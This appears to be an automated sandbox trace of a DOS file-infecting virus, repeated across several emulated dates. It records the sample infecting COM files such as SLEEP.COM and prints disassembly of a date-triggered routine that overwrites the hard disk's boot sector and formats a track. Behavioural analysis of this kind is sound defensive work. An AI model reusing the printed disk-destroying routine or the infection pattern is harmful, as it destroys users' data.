2018-12-25T11:52:08.712458256Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.099431151Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.101098668Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.102731892Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.104299765Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.107484729Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.114498745Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.121171259Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.150464836Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.171930986Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.173448134Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.180798191Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.192237886Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.194166674Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.197397811Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.217167541Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.228619604Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.235620252Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.237539895Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.244645456Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.255196133Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.257052198Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.258832027Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.2623211Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.270398552Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.283841595Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.285454343Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.2939955Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.320617975Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.322993328Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.327608376Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.333004133Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.342349602Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.351059199Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.353467497Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.361123449Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.376242653Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.379786875Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.383157846Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.389734507Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.401889326Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.409721296Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.411672907Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.420317709Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.431793578Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.435084771Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.439370971Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.446518103Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.458074767Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.466813233Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.469227734Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.476782343Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.48806459Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.491725464Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.495019619Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.502462686Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.514860179Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.522580203Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.524646548Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.532804114Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.546448557Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.549064997Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.552662312Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.558901159Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.57088694Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.579467628Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.581316046Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.588912331Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:08.591099499Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:08.594568863Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:08.596540142Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:08.598483154Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.607703779Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:08.609741112Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:08.619686836Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:08.623431724Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:08.626951172Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:08.629020916Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:08.63251433Z 62 PC: 1448c | Close file
2018-12-25T11:52:08.642461976Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:08.654128865Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.666413073Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.668374151Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.671472834Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:08.677869314Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:08.680128437Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:08.693413349Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:08.695702509Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:08.702831108Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.490800126Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.492230586Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.494296562Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.496609576Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.500406126Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.506493529Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.510217012Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:08.524184042Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:08.541131102Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:08.542971757Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:08.549521281Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:08.559826122Z 62 PC: 143b9 | Close file
2018-12-25T11:52:08.56187938Z 79 PC: 143bd | Find next file
2018-12-25T11:52:08.564761403Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.571585787Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.581803201Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.588530526Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.596407618Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.601930938Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.612411523Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.614529789Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.617313645Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.623044707Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.637844769Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.644431074Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.645767226Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.652699674Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.662343024Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.664095173Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.666460841Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.676305151Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.683332646Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.69052586Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.691806077Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.699623747Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.711631446Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.71292865Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.715108196Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.719128582Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.727058469Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.736795785Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.742414558Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.748612321Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.758461096Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.761544079Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.764400136Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.772497832Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.782755363Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.790447832Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.791755462Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.798181036Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.8119798Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.814020077Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.816875764Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.823806949Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:08.833820842Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:08.840628056Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:08.843342024Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:08.849755107Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:08.860224061Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:08.862992495Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:08.865561717Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:08.876936688Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.018463367Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.02293228Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.024213022Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.090597138Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.09274269Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.096050171Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.098596Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.101384916Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.10828166Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.110735529Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.228432881Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.231021158Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.235623227Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.238842171Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.240654687Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.24884617Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.269510564Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.274628493Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.276336723Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.279779779Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.285914933Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.287683221Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.296676783Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.29879785Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.303053639Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.854548087Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.856471551Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.85879298Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.861176135Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.863560349Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.870782479Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.876822463Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.229210131Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.239459009Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.241889033Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.2621426Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.273680298Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.275808731Z 79 PC: 143bd | Find next file
2018-12-25T11:52:09.278812282Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.285633628Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.296025222Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.302882084Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.304906544Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.312575868Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.323527899Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.32584518Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.330203017Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.336971583Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.348764871Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.358070508Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.359999833Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.365298033Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.37412155Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.378019457Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.38069243Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.387735648Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.408040821Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.414895109Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.417418476Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.42417029Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.446946196Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.449359458Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.454684281Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.460933546Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.472660912Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.480085593Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.481546511Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.488539552Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.499728492Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.501766751Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.504603634Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.511435538Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.522229619Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.537486601Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.540300871Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.546769561Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.557417679Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.560560261Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.563531097Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.569451691Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.580245047Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.587330343Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.589002087Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.597076645Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.6153933Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.618502687Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.621867509Z 67 PC: 1439d | Get or set file attributes (See above)
2018-12-25T11:52:09.628710471Z 67 PC: 143a9 | Get or set file attributes (See above)
2018-12-25T11:52:09.638578224Z 61 PC: 143ca | Open file (See above)
2018-12-25T11:52:09.646077291Z 87 PC: 143d6 | Get or set file date and time (See above)
2018-12-25T11:52:09.647773763Z 63 PC: 143ea | Read file or device (See above)
2018-12-25T11:52:09.650630089Z 66 PC: 143fa | Move file pointer
2018-12-25T11:52:09.653066122Z 63 PC: 14406 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:52:09.656701829Z 66 PC: 1440f | Move file pointer
2018-12-25T11:52:09.658413124Z 66 PC: 1442b | Move file pointer
2018-12-25T11:52:09.660251Z 63 PC: 14437 | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.664296215Z 66 PC: 14453 | Move file pointer
2018-12-25T11:52:09.666748835Z 64 PC: 14461 | Write file or device (Write 2767 bytes on handle 5)
2018-12-25T11:52:09.678862884Z 66 PC: 1446a | Move file pointer
2018-12-25T11:52:09.681678669Z 64 PC: 14476 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:52:09.684738527Z 87 PC: 14480 | Get or set file date and time
2018-12-25T11:52:09.686412182Z 87 PC: 14488 | Get or set file date and time
2018-12-25T11:52:09.689316294Z 62 PC: 1448c | Close file
2018-12-25T11:52:09.697001629Z 67 PC: 14497 | Get or set file attributes
2018-12-25T11:52:09.707688284Z 67 PC: 143b5 | Get or set file attributes (See above)
2018-12-25T11:52:09.713532198Z 62 PC: 143b9 | Close file (See above)
2018-12-25T11:52:09.715424453Z 79 PC: 143bd | Find next file (See above)
2018-12-25T11:52:09.718183152Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=000017D4h/0000006100d bytes. ')
2018-12-25T11:52:09.724638469Z 48 PC: 12a8f | Get DOS version
2018-12-25T11:52:09.726495238Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T11:52:09.734557507Z 93 PC: 12afe | File sharing functions
2018-12-25T11:52:09.738267241Z 9 PC: 12a86 | Display string (See above)
2018-12-25T11:52:09.742865264Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":15,"Min":0,"Second":0,"TimeBased":true,"OriginalID":4535,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:08.823311681Z 48 PC: 14228 | Get DOS version
2018-12-25T11:52:08.825419657Z 44 PC: 14304 | Get time 0x14304: cmp ch, 9
0x14307: jne 0x14310
0x14309: mov ah, 9
0x1430b: mov dx, 0x397
0x1430e: int 0x21
0x14310: mov ah, 0x2c
0x14312: int 0x21
0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
2018-12-25T11:52:08.827906185Z 44 PC: 14314 | Get time 0x14314: cmp ch, 0xf
0x14317: jne 0x14320
0x14319: mov ah, 9
0x1431b: mov dx, 0x397
0x1431e: int 0x21
0x14320: mov ah, 0x2a
0x14322: int 0x21
0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
2018-12-25T11:52:08.830341272Z 9 PC: 14320 | Display string (Could not find end pointer)
2018-12-25T11:52:08.948572383Z 42 PC: 14324 | Get date 0x14324: cmp dl, 0x1a
0x14327: jne 0x14367
0x14329: xor dx, dx
0x1432b: mov ah, 0
0x1432d: mov dl, 0x80
0x1432f: int 0x13
0x14331: mov ah, 3
0x14333: mov al, 1
0x14335: mov dl, 0x80
0x14337: mov dh, 0
0x14339: mov cx, 1
0x1433c: mov bx, 0x41c
0x1433f: int 0x13
0x14341: mov ah, 4
0x14343: mov dl, 0x80
0x14345: mov dh, 0
0x14347: mov cx, 1
0x1434a: int 0x13
0x1434c: mov ah, 9
0x1434e: mov dx, 0x3c4
2018-12-25T11:52:08.952980277Z 78 PC: 14390 | Find first file
2018-12-25T11:52:08.95719105Z 67 PC: 1439d | Get or set file attributes
2018-12-25T11:52:08.964599252Z 67 PC: 143a9 | Get or set file attributes
2018-12-25T11:52:09.229169295Z 61 PC: 143ca | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:52:09.235806038Z 87 PC: 143d6 | Get or set file date and time
2018-12-25T11:52:09.238181041Z 63 PC: 143ea | Read file or device (Read 1 bytes on handle 5)
2018-12-25T11:52:09.245704703Z 67 PC: 143b5 | Get or set file attributes
2018-12-25T11:52:09.255897445Z 62 PC: 143b9 | Close file
2018-12-25T11:52:09.258818125Z 79 PC: 143bd | Find next file
